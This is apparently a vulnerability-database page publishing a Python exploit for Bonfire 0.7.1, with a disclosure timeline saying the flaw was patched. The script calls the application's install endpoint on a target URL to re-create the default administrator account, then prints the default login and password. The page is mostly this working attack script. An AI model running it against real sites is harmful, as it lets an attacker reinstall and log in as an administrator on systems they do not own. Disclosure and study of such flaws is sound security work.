Bonefire 0.7.1 Reinstall Admin Account

2014.04.25
Credit: Mehmet INCE
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#!/usr/bin/env python # coding: utf-8 # # Bonefire v.0.7.1 Reinstall Admin Account Exploit # # Author : Mehmet INCE # # Analysis write-up : http://www.mehmetince.net/ci-bonefire-reinstall-admin-account-vulnerability-analysis-exploit/ # # Description : # Forgotten controls lead to call install module which lead to # create default administrator account again! # # TIMELINE # 21 Apr 2014 14:00 ?Vulnerability found # 23 Apr 2014 21:20 ? Analysis and write-up completed # 23 Apr 2014 21:29 ? First contact with lead developer of Bonfire # 23 Apr 2014 21:33 ? Response from lead developer # 23 Apr 2014 21:52 ? Vulnerability confirmed by lead developer # 23 Apr 2014 21:55 ? Vulnerability has been patched via following commit # https://github.com/ci-bonfire/Bonfire/commit/9cb76c66babf89952c3d48279b026c59e198f46e import urllib2 import sys import re target = sys.argv[1] path = sys.argv[2] if len(sys.argv) > 3: print "Usage : python bonfire www.target.com /path/" exit(0) content = urllib2.urlopen(target+path+"index.php/install/do_install").read() if re.search('[admin@mybonefire.com]', content): print "Target is vulnerable!" print "Username : admin@mybonefire.com" print "Password : password" else: print "Target is not vulnerable..."

References:

http://an7isec.blogspot.com/2014/04/pown-noobs-acunetix-0day.html
https://www.youtube.com/watch?v=ifv9fRzVEzw


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top